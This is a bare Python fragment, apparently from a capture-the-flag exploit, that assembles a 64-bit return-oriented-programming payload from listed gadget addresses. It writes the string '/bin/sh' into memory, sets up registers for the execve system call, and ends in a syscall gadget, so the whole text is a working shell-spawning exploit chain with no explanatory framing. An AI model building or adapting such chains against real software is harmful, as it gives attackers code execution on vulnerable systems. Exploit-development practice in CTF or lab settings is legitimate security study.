payload = p64(0x401dd5)
#0x0000000000401dd5: pop rbx; pop rbp; ret; 
payload += p64(0x80)+p64(0x40e268)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401dd5)
# 0x0000000000401dd5: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40e0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401dd5)
# 0x0000000000401dd5: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40e0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40e070)+p64(0x401d70)
# 0x0000000000401d70: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x401dd5)
# 0x0000000000401dd5: pop rbx; pop rbp; ret; 
payload += p64(0x36b0e040)+p64(0x0)+p64(0x4031d9)
# 0x00000000004031d9: mov eax, ebx; add rsp, 8; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x401dd5)
# 0x0000000000401dd5: pop rbx; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x4031d9)
# 0x00000000004031d9: mov eax, ebx; add rsp, 8; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4074aa)
# 0x00000000004074aa: syscall; 
payload += b''
